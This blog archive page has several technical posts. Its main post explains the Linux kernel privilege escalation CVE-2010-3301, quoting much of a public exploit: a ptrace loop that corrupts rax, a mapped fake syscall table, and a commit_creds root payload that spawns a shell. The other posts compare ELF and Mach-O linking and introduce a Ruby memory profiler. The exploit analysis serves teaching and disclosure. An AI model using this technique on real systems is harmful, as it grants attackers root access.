time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Archive for the ‘x86’ tag

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look2:

ia32_tracesys:                   
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro3:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call which actually transfers execution to the system call4:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code is calling the function whose address is stored at ia32_sys_call_table[8 * %rax]. That is, the (8 * %rax)th entry in the ia32_sys_call_table.

subtle bug leads to sexy exploit

This bug was originally discovered by the polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made by possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker cause an integer overflow in ia32_do_call causing the kernel to hand off execution to an arbitrary address.

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced with ptrace by setting the PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */
                
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }
 
                /* ... */
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */            

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424 []
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439 []
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50 []
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430 []

Written by Joe Damato

September 27th, 2010 at 4:59 am

Garbage Collection and the Ruby Heap (from railsconf)

View Comments

Written by Joe Damato

June 8th, 2010 at 9:38 am

Dynamic symbol table duel: ELF vs Mach-O, round 2

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

The intention of this post is to continue highlighting some of the similarities and differences between ELF and Mach-O that I encountered while building memprof. The previous post in this series can be found here.

What is a symbol table?

A symbol table is simply a list of names in an object. The names in the list may be names of functions, initialized/uninitialized memory regions, or other things depending on the object format. The symbol table does not need to be mapped into a running process and is only useful for debugging. The symbol table (and other sections) may be removed from an object when you use strip.

Symbol tables in ELF objects

An entry in the symbol table in an ELF object can best be described by the following struct from /usr/include/elf.h:

typedef struct
{
  Elf64_Word    st_name;                /* Symbol name (string tbl index) */
  unsigned char st_info;                /* Symbol type and binding */
  unsigned char st_other;               /* Symbol visibility */
  Elf64_Section st_shndx;               /* Section index */
  Elf64_Addr    st_value;               /* Symbol value */
  Elf64_Xword   st_size;                /* Symbol size */
} Elf64_Sym;

In most cases, this structure is used to find the mapping from a symbol name to the address where it lives. Although, different symbol types (specified by st_info) provide mappings from symbols to other data.

The st_name field is an index into a section called strtab which is just a table of strings.

Symbol tables in Mach-O objects

Let’s take a look at the struct for a symbol table entry in a Mach-O object from /usr/include/mach-o/nlist.h:

struct nlist_64 {
    union {
        uint32_t  n_strx; /* index into the string table */
    } n_un;
    uint8_t n_type;        /* type flag */
    uint8_t n_sect;        /* section number or NO_SECT */
    uint16_t n_desc;       /* see  */
    uint64_t n_value;      /* value of this symbol (or stab offset) */
};

It looks very similar. The immediately noticeable difference with ELF:

  • lack of size field – The only noticeable difference on your first glance is the lack of a size field. The size field in ELF objects describes the number of bytes occupied by the symbol. This is actually pretty useful, especially for memprof. The lack of this field in Mach-O was a source of frustration for Jake when he was implementing Mach-O support.

What is a dynamic symbol table?

Shared objects in both Mach-O and ELF have a symbol table listing only functions that are exporteed by the object.

This table is used during dynamic linking and is mapped into the process’ address space when the object is loaded, unlike the symbol table which is just used for debugging.

The dynamic symbol table is a subset of the symbol table.

Dynamic symbol table in ELF objects

The dynamic symbol table in ELF objects is stored in a section named dynsym. The indexes stored in the st_name field (from the structure listed above) are indexes into the string table in a section named dynstr. dynstr is a string table specifically for entries in the dynamic symbol table.

If you know the symbol you care about, you can simply calculate a hash of the symbol name to find the symbol table entry for that symbol. Unfortunately, there is not very much documentation about the hash function that is to be used.

Your two options are:

The sections storing the hash table data for an object are called .hash and .gnu.hash.

Dynamic symbol table in Mach-O objects

Finding the dynamic symbol table in a Mach-O object is a bit complicated. The pieces to the puzzle are found across different structures and the documentation on how it all works is sparse.

Mach-O objects have a load command called LC_DYSYMTAB which describes information about the dynamic symbol table in Mach-O objects.

I’ve shortened the structure definition, as it is quite large and contains documentation about stuff that is not directly relevant to this post. From /usr/include/mach-o/loader.h:

struct dysymtab_command {
    uint32_t cmd; /* LC_DYSYMTAB */
    uint32_t cmdsize; /* sizeof(struct dysymtab_command) */

    /* .... */

    /*
     * The sections that contain "symbol pointers" and "routine stubs" have
     * indexes and (implied counts based on the size of the section and fixed
     * size of the entry) into the "indirect symbol" table for each pointer
     * and stub.  For every section of these two types the index into the
     * indirect symbol table is stored in the section header in the field
     * reserved1.  An indirect symbol table entry is simply a 32bit index into
     * the symbol table to the symbol that the pointer or stub is referring to.
     * The indirect symbol table is ordered to match the entries in the section.
     */
    uint32_t indirectsymoff; /* file offset to the indirect symbol table */
    uint32_t nindirectsyms;  /* number of indirect symbol table entries */

    /* .... */
};

The LC_DYSYMTAB load command provides the fields indirectsymoff and nindirectsyms which describe the offset into the file where the indirect symbol tables lives and the number of entries in the table, respectively.

The dynamic symbol table in Mach-O is surprisingly simple. Each entry in the table is just a 32bit index into the symbol table. The dynamic symbol table is just a list of indexes and nothing else.

It turns out there are a few more pieces to the puzzle.

Take a look at the definition for a Mach-O section:

struct section_64 { /* for 64-bit architectures */
  char    sectname[16]; /* name of this section */
  char    segname[16];  /* segment this section goes in */
  uint64_t  addr;   /* memory address of this section */
  uint64_t  size;   /* size in bytes of this section */
  uint32_t  offset;   /* file offset of this section */
  uint32_t  align;    /* section alignment (power of 2) */
  uint32_t  reloff;   /* file offset of relocation entries */
  uint32_t  nreloc;   /* number of relocation entries */
  uint32_t  flags;    /* flags (section type and attributes)*/
  uint32_t  reserved1;  /* reserved (for offset or index) */
  uint32_t  reserved2;  /* reserved (for count or sizeof) */
  uint32_t  reserved3;  /* reserved */
};

It turns out that the fields reserved1 and reserved2 are useful too.

If a section_64 structure is describing a symbol_stub or __la_symbol_ptr sections (read the previous post to learn about these sections), then the reserved1 field hold the index into the dynamic symbol table for the sections entries in the table.

symbol_stub sections also make use of the reserved2 field; the size of a single stub entry is stored in reserved2 otherwise, the field is set to 0.

Two notable differences between the dynamic symbol tables

  • There is an explicit section in ELF that contains Elf64_Sym entries. On Mach-O it’s just a list of 32bit offsets.
  • ELF provides a .hash section and/or .gnu_hash section to speed up symbol lookup. Mach-O does not.

What happens when you run strip?

Let’s use strip with no options (other than the filename).

On ELF:

  • All .debug_* sections are removed. These sections contain extra debugging information that helps debuggers figure out more precisely what went wrong.
  • .symtab section is removed.
  • .strtab section is removed.

On Mach-O:

  • Only undefined symbols and dynamic symbols are left in the symbol table. Everything else is removed.

How to strip so I can debug later (linux only)

If you decide to strip your binary please be considerate to future hackers who may need to debug your app for some reason.

You can be considerate by following the directions in strip(1):

1. Link the executable as normal. Assuming that is is called
“foo” then…

2. Run “objcopy –only-keep-debug foo foo.dbg” to
create a file containing the debugging info.

3. Run “objcopy –strip-debug foo” to create a
stripped executable.

4. Run “objcopy –add-gnu-debuglink=foo.dbg foo”
to add a link to the debugging info into the stripped executable.

And don’t forget to put your debugging information somewhere easily accessible and googleable.

If you do this: you are cool. If you don’t…

Conclusion

  1. I like the way ELF does dynamic symbol tables, the gnu_debuglink section, and the lookup hash table for dynamic symbols. All of these pieces are really useful and I am glad they exist.
  2. The indirect symbol table was a bit of a pain to track down on Mach-O as the information is hard to parse on the first pass. To be fair, it is all there if you google around a bit and put the pieces together.
  3. On Linux, if you strip, please add a gnu_debuglink section and put the debug information somewhere I can find it.

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

References

Written by Joe Damato

June 1st, 2010 at 5:59 am

Posted in linux,osx,systems,x86

Tagged with , , , , , ,

Dynamic Linking: ELF vs. Mach-O

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

The intention of this post is to highlight some of the similarities and differences between ELF and Mach-O dynamic linking that I encountered while building memprof.

I hope to write more posts about similarities and differences in other aspects of Mach-O and ELF that I stumbled across to shed some light on what goes on down there and provide (in some cases) the only documentation.

Procedure Linkage Table

The procedure linkage table (PLT) is used to determine the absolute address of a function at runtime. Both Mach-O and ELF objects have PLTs that are generated at compile time. The initial table simply invokes the dynamic linker which finds the symbol you want. The way this works is very similar at a high level in ELF and Mach-O, but there are some implementation differences that I thought were worth mentioning.

Mach-O PLT arrangement

Mach-O objects have several different sections across different segments that are all involved to create a PLT entry for a specific symbol.

Consider the following assembly stub which calls out to the PLT entry for malloc:

# MACH-O calling a PLT entry (ELF is nearly identical)
0x000000010008c504 [str_new+52]:	callq  0x10009ebbc [dyld_stub_malloc]

The dyld_stub prefix is added by GDB to let the user know that the callq instruction is calling a PLT entry and not malloc itself. The address 0x10009ebbc is the first instruction of malloc‘s PLT entry in this Mach-O object. In Mach-O terminology, the instruction at 0x10009ebbc is called a symbol stub. Symbol stubs in Mach-O objects are found in the __TEXT segment in the __symbol_stub1 section.

Let’s examine some instructions at the symbol stub address above:

# MACH-O "symbol stubs" for malloc and other functions
0x10009ebbc [dyld_stub_malloc]:	  jmpq   *0x3ae46(%rip)        # 0x1000d9a08
0x10009ebc2 [dyld_stub_realloc]:  jmpq   *0x3ae48(%rip)        # 0x1000d9a10
0x10009ebc8 [dyld_stub_seekdir$INODE64]:	jmpq   *0x3ae4c(%rip)  # 0x1000d9a20
. . . .

Each Mach-O symbol stub is just a single jmpq instruction. That jmpq instruction either:

  • Invokes the dynamic linker to find the symbol and transfer execution there
  • OR

  • Transfers execution directly to the function.

via an entry in a table.

In the example above, GDB is telling us that the address of the table entry for malloc is 0x1000d9a08. This table entry is stored in a section called the __la_symbol_ptr within the __DATA segment.

Before malloc has been resolved, the address in that table entry points to a helper function which (eventually) invokes the dynamic linker to find malloc and fill in its address in the table entry.

Let’s take a look at what a few entries of the helper functions look like:

# MACH-O stub helpers
0x1000a08d4 [stub helpers+6986]:	pushq  $0x3b73
0x1000a08d9 [stub helpers+6991]:	jmpq   0x10009ed8a [stub helpers]
0x1000a08de [stub helpers+6996]:	pushq  $0x3b88
0x1000a08e3 [stub helpers+7001]:	jmpq   0x10009ed8a [stub helpers]
0x1000a08e8 [stub helpers+7006]:	pushq  $0x3b9e
0x1000a08ed [stub helpers+7011]:	jmpq   0x10009ed8a [stub helpers]
. . . . 

Each symbol that has a PLT entry has 2 instructions above; a pair of pushq and jmpq. This instruction sequence sets an ID for the desired function and then invokes the dynamic linker. The dynamic linker looks up this ID so it knows which function it should be looking for.

ELF PLT arrangement

ELF objects have the same mechanism, but organize each PLT entry into chunks instead of splicing them out across different sections. Let’s take a look at a PLT entry for malloc in an ELF object:

# ELF complete PLT entry for malloc
0x40f3d0 [malloc@plt]:	jmpq   *0x2c91fa(%rip)        # 0x6d85d0
0x40f3d6 [malloc@plt+6]:	pushq  $0x2f
0x40f3db [malloc@plt+11]:	jmpq   0x40f0d0
. . . .

Much like a Mach-O object, an ELF object uses a table entry to direct the flow of execution to either invoke the dynamic linker or transfer directly to the desired function if it has already been resolved.

Two differences to point out here:

  1. ELF puts the entire PLT entry together in nicely named section called plt instead of splicing it out across multiple sections.
  2. The table entries indirected through with the initial jmpq instruction are stored in a section named: .got.plt.

Both invoke an assembly trampoline…

Both Mach-O and ELF objects are set up to invoke the runtime dynamic linker. Both need an assembly trampoline to bridge the gap between the application and the linker. On 64bit Intel based systems, linkers in both systems must comply to the same Application Binary Interace (ABI).

Strangely enough, the two linkers have slightly different assembly trampolines even though they share the same calling convention1 2.

Both trampolines ensure that the program stack is 16-byte aligned to comply with the amd64 ABI’s calling convention. Both trampolines also take care to save the “general purpose” caller-saved registers prior to invoking the dynamic link, but it turns out that the trampoline in Linux does not save or restore the SSE registers. It turns out that this “shouldn’t” matter, so long as glibc takes care not to use any of those registers in the dynamic linker. OSX takes a more conservative approach and saves and restores the SSE registers before and after calling out the dynamic linker.

I’ve included a snippet from the two trampolines below and some comments so you can see the differences up close.

Different trampolines for the same ABI

The OSX trampoline:

dyld_stub_binder:
  pushq   %rbp
  movq    %rsp,%rbp
  subq    $STACK_SIZE,%rsp  # at this point stack is 16-byte aligned because two meta-parameters where pushed
  movq    %rdi,RDI_SAVE(%rsp) # save registers that might be used as parameters
  movq    %rsi,RSI_SAVE(%rsp)
  movq    %rdx,RDX_SAVE(%rsp)
  movq    %rcx,RCX_SAVE(%rsp)
  movq    %r8,R8_SAVE(%rsp)
  movq    %r9,R9_SAVE(%rsp)
  movq    %rax,RAX_SAVE(%rsp)
  movdqa    %xmm0,XMMM0_SAVE(%rsp)
  movdqa    %xmm1,XMMM1_SAVE(%rsp)
  movdqa    %xmm2,XMMM2_SAVE(%rsp)
  movdqa    %xmm3,XMMM3_SAVE(%rsp)
  movdqa    %xmm4,XMMM4_SAVE(%rsp)
  movdqa    %xmm5,XMMM5_SAVE(%rsp)
  movdqa    %xmm6,XMMM6_SAVE(%rsp)
  movdqa    %xmm7,XMMM7_SAVE(%rsp)
  movq    MH_PARAM_BP(%rbp),%rdi  # call fastBindLazySymbol(loadercache, lazyinfo)
  movq    LP_PARAM_BP(%rbp),%rsi
  call    __Z21_dyld_fast_stub_entryPvl

The OSX trampoline saves all the caller saved registers as well as the the %xmm0 - %xmm7 registers prior to invoking the dynamic linker with that last call instruction. These registers are all restored after the call instruction, but I left that out for the sake of brevity.

The Linux trampoline:

  subq $56,%rsp 
  cfi_adjust_cfa_offset(72) # Incorporate PLT
  movq %rax,(%rsp)  # Preserve registers otherwise clobbered.
  movq %rcx, 8(%rsp)
  movq %rdx, 16(%rsp)
  movq %rsi, 24(%rsp)
  movq %rdi, 32(%rsp)
  movq %r8, 40(%rsp)
  movq %r9, 48(%rsp)
  movq 64(%rsp), %rsi # Copy args pushed by PLT in register.
  movq %rsi, %r11   # Multiply by 24
  addq %r11, %rsi
  addq %r11, %rsi
  shlq $3, %rsi
  movq 56(%rsp), %rdi # %rdi: link_map, %rsi: reloc_offset
  call _dl_fixup    # Call resolver.

The Linux trampoline doesn’t touch the SSE registers because it assumes that the dynamic linker will not modify them thus avoiding a save and restore.

Conclusion

  • Tracing program execution from call site to the dynamic linker is pretty interesting and there is a lot to learn along the way.
  • glibc not saving and restoring %xmm0-%xmm7 kind of scares me, but there is a unit test included that disassembles the built ld.so searching it to make sure that those registers are never touched. It is still a bit frightening.
  • Stay tuned for more posts explaining other interesting similarities and differences between Mach-O and ELF coming soon.

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://developer.apple.com/mac/library/documentation/DeveloperTools/Conceptual/LowLevelABI/140-x86-64_Function_Calling_Conventions/x86_64.html#//apple_ref/doc/uid/TP40005035-SW1 []
  2. http://www.x86-64.org/documentation/abi.pdf []

Written by Joe Damato

May 12th, 2010 at 7:00 am

memprof: A Ruby level memory profiler

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

What is memprof and why do I care?

memprof is a Ruby gem which supplies memory profiler functionality similar to bleak_house without patching the Ruby VM. You just install the gem, call a function or two, and off you go.

Where do I get it?

memprof is available on gemcutter, so you can just:

gem install memprof

Feel free to browse the source code at: http://github.com/ice799/memprof.

How do I use it?

Using memprof is simple. Before we look at some examples, let me explain more precisely what memprof is measuring.

memprof is measuring the number of objects created and not destroyed during a segment of Ruby code. The ideal use case for memprof is to show you where objects that do not get destroyed are being created:

  • Objects are created and not destroyed when you create new classes. This is a good thing.
  • Sometimes garbage objects sit around until garbage_collect has had a chance to run. These objects will go away.
  • Yet in other cases you might be holding a reference to a large chain of objects without knowing it. Until you remove this reference, the entire chain of objects will remain in memory taking up space.

memprof will show objects created in all cases listed above.

OK, now Let’s take a look at two examples and their output.

A simple program with an obvious memory “leak”:

require 'memprof'

@blah = Hash.new([])

Memprof.start
100.times {
  @blah[1] << "aaaaa"
}

1000.times {
   @blah[2] << "bbbbb"
}
Memprof.stats
Memprof.stop

This program creates 1100 objects which are not destroyed during the start and stop sections of the file because references are held for each object created.

Let's look at the output from memprof:

   1000 test.rb:11:String
    100 test.rb:7:String

In this example memprof shows the 1100 created, broken up by file, line number, and type.

Let's take a look at another example:

require 'memprof'
Memprof.start
require "stringio"
StringIO.new
Memprof.stats

This simple program is measuring the number of objects created when requiring stringio.

Let's take a look at the output:

    108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
     14 test2.rb:3:String
      2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
      1 test2.rb:4:StringIO
      1 test2.rb:4:String
      1 test2.rb:3:Array
      1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable

This output shows an internal Ruby interpreter type __node__ was created (these represent code), as well as a few Strings and other objects. Some of these objects are just garbage objects which haven't had a chance to be recycled yet.

What if nudge the garbage_collector along a little bit just for our example? Let's add the following two lines of code to our previous example:

GC.start
Memprof.stats

We're now nudging the garbage collector and outputting memprof stats information again. This should show fewer objects, as the garbage collector will recycle some of the garbage objects:

    108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
      2 test2.rb:3:String
      2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
      1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable

As you can see above, a few Strings and other objects went away after the garbage collector ran.

Which Rubies and systems are supported?

  • Only unstripped binaries are supported. To determine if your Ruby binary is stripped, simply run: file `which ruby`. If it is, consult your package manager's documentation. Most Linux distributions offer a package with an unstripped Ruby binary.
  • Only x86_64 is supported at this time. Hopefully, I'll have time to add support for i386/i686 in the immediate future.
  • Linux Ruby Enterprise Edition (1.8.6 and 1.8.7) is supported.
  • Linux MRI Ruby 1.8.6 and 1.8.7 built with --disable-shared are supported. Support for --enable-shared binaries is coming soon.
  • Snow Leopard support is experimental at this time.
  • Ruby 1.9 support coming soon.

How does it work?

If you've been reading my blog over the last week or so, you'd have noticed two previous blog posts (here and here) that describe some tricks I came up with for modifying a running binary image in memory.

memprof is a combination of all those tricks and other hacks to allow memory profiling in Ruby without the need for custom patches to the Ruby VM. You simply require the gem and off you go.

memprof works by inserting trampolines on object allocation and deallocation routines. It gathers metadata about the objects and outputs this information when the stats method is called.

What else is planned?

Myself, Jake Douglas, and Aman Gupta have lots of interesting ideas for new features. We don't want to ruin the surprise, but stay tuned. More cool stuff coming really soon :)

Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.

Written by Joe Damato

December 11th, 2009 at 5:59 am